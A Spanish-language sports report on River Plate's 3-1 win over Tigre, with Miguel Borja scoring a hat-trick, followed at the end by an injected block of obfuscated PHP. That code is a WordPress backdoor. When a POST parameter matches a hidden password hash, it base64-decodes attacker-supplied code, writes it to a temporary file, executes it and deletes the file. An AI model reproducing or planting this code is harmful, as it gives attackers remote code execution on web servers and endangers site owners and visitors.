Con un Colibrí Borja en las alturas, River Plate le ganó a Tigre y levanta cabeza

River Plate venció a Tigre 3-1, en el estadio Monumental, por la cuarta fecha del Torneo 2024 de la Liga Profesional y retomó la senda del la victoria, tras la derrota ante Argentinos Juniors en la pasada jornada. Miguel Colibrí Borja extendió su racha goleadora, anotando los tres goles del Millonario.

La mano de Facundo Chuky Ferreyra se interpuso, dentro del área, en un tiro de Sebastián Boselli. Borja convirtió el penal, desatando el primero de sus gritos, a los 11 minutos. Siguió encendido el colombiano y estuvo cerca de volver a marcar, a los 23, pero su remate, cerrando una lucida maniobra colectiva, salió arriba del travesaño.

Tigre, que atraviesa un mal presente y está bajo amenaza de descenso, no se rindió. Con sus limitaciones intentó y buscó. Un remate de Facundo Ferreyra pegó en el poste, a los 27 minutos. Y accedió al empate, a los 45 minutos, con un penal convertido por Gonzalo Maroni. La infracción nació de un error de Paulo Díaz y la falta de Franco Armani a Blas Armoa.

En el inicio del segundo tiempo, Borja y sus goles le permitieron a River Plate liquidar el partido. Con un zurdazo, de media vuelta, a los 7 minutos, y con otro penal -por falta de Tomás Fernández a Pablo Solari-, a los 10 minutos, el implacable goleador completó su hatt-trick.

Rondó el cuarto festejo, Borja pero definió mal, a los 16 minutos, en una posición muy favorable. Más allá del fervor de Tigre, el equipo de Martín Demichelis no paso grandes sobresaltos y hasta pudo estirar la diferencia.

River Plate suma 9 puntos, uno menos que los punteros Racing Club y Talleres. En la próxima fecha, el Millonario visitará a Deportivo Riestra, el jueves 13, a las 15.30.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}